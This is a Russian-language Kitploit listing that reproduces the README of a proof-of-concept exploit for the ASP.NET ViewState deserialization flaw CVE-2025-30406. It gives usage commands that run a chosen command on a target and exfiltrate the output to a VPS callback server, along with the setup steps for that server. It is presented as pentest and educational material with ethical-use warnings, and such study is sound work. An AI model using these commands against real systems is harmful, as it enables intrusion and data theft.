Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-30406 — CVE-2025-30406 ViewState Exploit PoC | Kitploit
Инструменты/GitHubGitHub/mchklt/cve-2025-30406
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 ViewState Exploit PoC

Репозиторий
901841 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-30406 Эксплойт PoC для ViewState

Обзор

Этот скрипт Proof-of-Concept (PoC) демонстрирует эксплуатацию десериализации ViewState для CVE-2025-30406 в ASP.NET приложениях. Он использует ysoserial для генерации вредоносной полезной нагрузки ViewState и отправляет её на указанный URL для выполнения заданной команды. Для наилучшего результата вывод команды можно отправить на пользовательский HTTP-сервер (server.py), работающий на VPS, который отображает результаты в стилизованном формате с временными метками, зелёными приглашениями и белым текстом. Этот скрипт предназначен только для образовательных целей и должен использоваться исключительно на системах, где у вас есть явное разрешение на проведение тестирования безопасности. Несанкционированное использование незаконно и неэтично.

Детали CVE

  • CVE ID: CVE-2025-30406
  • Описание: Уязвимость десериализации в обработке ViewState ASP.NET, позволяющая удалённо выполнять код при наличии действительного ключа проверки и генератора.
  • Затронутые системы: ASP.NET приложения с уязвимыми конфигурациями ViewState.
  • Необходимые условия для эксплуатации:
    • Доступ к действительному ключу проверки ViewState и генератору.
    • Уязвимая конечная точка, принимающая параметры ViewState.

Содержимое репозитория

  • exploit.py: Основной скрипт PoC для генерации и отправки полезной нагрузки ViewState.
Скачать инструмент
  • server.py: HTTP-сервер для получения и отображения выведенных команд в стилизованном формате.
  • README.md: Этот файл с инструкциями по установке и использованию.
  • Предварительные требования

    • Python 3.x
    • Библиотека requests (pip install requests)
    • Исполняемый файл ysoserial (Windows или аналог для вашей платформы)
    • Конечная точка уязвимого ASP.NET приложения
    • VPS или сервер для запуска server.py (рекомендуется для эксфильтрации)
    • Разрешение на тестирование целевой системы

    Установка

    1. Клонируйте этот репозиторий:
      root@kitploit:~
      git clone https://github.com/yourusername/cve-2025-30406-poc.git
      cd cve-2025-30406-poc
      
    2. Установите необходимый пакет Python:
      root@kitploit:~
      pip install requests
      
    3. Загрузите ysoserial и поместите его в ту же директорию, что и exploit.py, или укажите путь к нему:
      • ysoserial на GitHub

    Настройка на VPS (рекомендуется)

    Для получения выведенных команд в стилизованном формате запустите server.py на VPS:

    1. Скопируйте server.py на ваш VPS (например, через scp):
      root@kitploit:~
      scp server.py user@your-vps-ip:/home/user/
      
    2. Убедитесь, что Python 3 установлен:
      root@kitploit:~
      sudo apt update && sudo apt install python3 python3-pip
      
    3. Запустите сервер (порт по умолчанию 8000):
      root@kitploit:~
      python3 server.py
      
    4. Убедитесь, что брандмауэр VPS разрешает входящий трафик на порт 8000:
      root@kitploit:~
      sudo ufw allow 8000
      
    5. Запомните публичный IP или домен VPS (например, http://your-vps-ip:8000) для использования с флагом -e в exploit.py.

    Использование

    Запуск эксплойта

    Запустите exploit.py с обязательными аргументами. Флаг -e необязателен, но настоятельно рекомендуется для эксфильтрации вывода команды на server.py для стилизованного отображения.

    root@kitploit:~
    python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
    

    Аргументы

    • -u, --url: Целевой URL (например, http://target.com/page.aspx) [Обязательный]
    • -c, --command: Выполняемая команда (например, whoami) [Обязательный]
    • -y, --ysoserial: Путь к исполняемому файлу ysoserial (по умолчанию: ./ysoserial.exe) [Необязательный]
    • -e, --exfil: URL обратного вызова для эксфильтрации вывода команды (например, http://your-vps:8000) [Необязательный]

    Примеры

    1. Запуск без эксфильтрации (слепое выполнение):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
      
    2. Запуск с эксфильтрацией на VPS, где запущен server.py (рекомендуется):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
      

    Запуск сервера

    На вашем VPS или локальной машине запустите HTTP-сервер для получения эксфильтрированных данных:

    root@kitploit:~
    python3 server.py
    

    Сервер будет отображать вывод команд с временными метками, зелёным приглашением $ и белым текстом для удобства чтения.

    Принцип работы

    1. Скрипт эксплойта (exploit.py):
      • Использует ysoserial с жёстко закодированным ключом проверки и генератором для создания полезной нагрузки ViewState.
      • Если указан -e, команда оборачивается для захвата вывода и отправки его на URL обратного вызова через Invoke-WebRequest.
      • Отправляет полезную нагрузку целевой URL в POST-запросе, встраивая её в параметр __VIEWSTATE.
      • Выводит статус ответа сервера и часть тела ответа.
    2. HTTP-сервер (server.py):
      • Ожидает GET-запросы, содержащие вывод команды.
      • Декодирует путь URL и разбивает его на строки.
      • Выводит каждую строку с временной меткой, зелёным приглашением $ и белым текстом вывода.
      • Отвечает статусом HTTP 200 и “OK”.

    Предупреждение об этичном использовании

    • Этот скрипт является доказательством концепции для CVE-2025-30406, предназначенным для образовательных целей и авторизованного тестирования безопасности.
    • Не используйте этот скрипт на системах без явного разрешения владельца системы.
    • Неправильное использование может нарушить законы, включая Закон о компьютерном мошенничестве и злоупотреблениях (CFAA) в США или аналогичные законы в других странах.
    • Всегда получайте письменное согласие перед тестированием любой системы.
    • Сообщайте об уязвимостях ответственно, через скоординированное раскрытие или программы bug bounty.

    Ограничения

    • Жёстко закодированный ключ проверки и генератор могут работать только для конкретных уязвимых приложений. Пользователям могут потребоваться значения, специфичные для приложения.
    • Эксплойт нацелен на ASP.NET приложения, уязвимые к десериализации ViewState.
    • Скрипт предполагает, что целевой сервер корректно обрабатывает полезную нагрузку ViewState.
    • Кроссплатформенная совместимость зависит от доступности ysoserial (в основном на Windows).
    • Эксфильтрация требует общедоступного сервера для URL обратного вызова -e.

    Лицензия

    Этот проект лицензирован по лицензии MIT. Подробнее см. в файле LICENSE.

    Контакты

    По вопросам или для обратной связи, пожалуйста, откройте issue в этом репозитории.